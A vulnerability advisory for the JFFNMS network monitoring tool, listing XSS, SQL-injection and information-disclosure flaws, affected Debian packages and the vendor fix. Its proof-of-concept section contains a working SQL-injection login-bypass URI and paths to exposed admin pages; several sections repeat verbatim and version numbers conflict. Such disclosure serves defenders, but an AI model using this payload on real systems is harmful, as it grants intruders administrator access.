Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
BID:24414
Info
Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
| Bugtraq ID: | 24414 |
| Class: | Unknown |
| CVE: |
CVE-2007-3189 CVE-2007-3190 CVE-2007-3191 CVE-2007-3192 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 11 2007 12:00AM |
| Updated: | Jul 06 2016 02:39PM |
| Credit: | Tim Brown is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre2 Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre1 Debian Linux 4.0 sparc Debian Linux 4.0 s/390 Debian Linux 4.0 powerpc Debian Linux 4.0 mipsel Debian Linux 4.0 mips Debian Linux 4.0 m68k Debian Linux 4.0 ia-64 Debian Linux 4.0 ia-32 Debian Linux 4.0 hppa Debian Linux 4.0 arm Debian Linux 4.0 amd64 Debian Linux 4.0 alpha Debian Linux 4.0 |
| Not Vulnerable: |
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre3 |
Discussion
Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
Just For Fun Network Management and Monitoring System (JFFNMS) is prone to multiple remote vulnerabilities, including a cross-site scripting issue, an SQL-injection issue, and multiple information-disclosure issues.
An attacker can exploit these issues by manipulating the SQL query logic to carry out unauthorized actions on the underlying database, access sensitive information, and obtain cookie-based authentication credentials.
These issues affect versions prior to JFFNMS 0.8.4-pre3.
Exploit / POC
Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
An attacker can use a browser to exploit the SQL-injection and information-disclosure issues. The attacker can exploit the cross-site scripting issues by enticing an unsuspecting user to follow a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass=
http://www.example.com/auth.php?user=[xss]
http://192.168.1.1/admin/setup.php
http://192.168.1.1/admin/adm/test.php
An attacker can use a browser to exploit the SQL-injection and information-disclosure issues. The attacker can exploit the cross-site scripting issues by enticing an unsuspecting user to follow a malicious URI.
The following proof-of-concept URIs are available:
http://www.example.com/auth.php?user='%20union%20select%202,'admin','$1$RxS1ROtX$IzA1S3fcCfyVfA9rwKBMi.','Administrator'/*&pass=
http://www.example.com/auth.php?user=[xss]
http://192.168.1.1/admin/setup.php
http://192.168.1.1/admin/adm/test.php
Solution / Fix
Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
Solution:
The vendor released an update to address these issues. Please see the references for more information.
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre2
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre1
Solution:
The vendor released an update to address these issues. Please see the references for more information.
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre2
-
Debian jffnms_0.8.3dfsg.1-2.1etch1_all.deb
Debian GNU/Linux 4.0 alias etch
http://security.debian.org/pool/updates/main/j/jffnms/jffnms_0.8.3dfsg .1-2.1etch1_all.deb
Javier Szyszlican Just For Fun Network Management and Monitoring Sys 0.8.3-pre1
-
Debian jffnms_0.8.3dfsg.1-2.1etch1_all.deb
Debian GNU/Linux 4.0 alias etch
http://security.debian.org/pool/updates/main/j/jffnms/jffnms_0.8.3dfsg .1-2.1etch1_all.deb
References
Just For Fun Network Management and Monitoring System Multiple Remote Vulnerabilities
References:
References: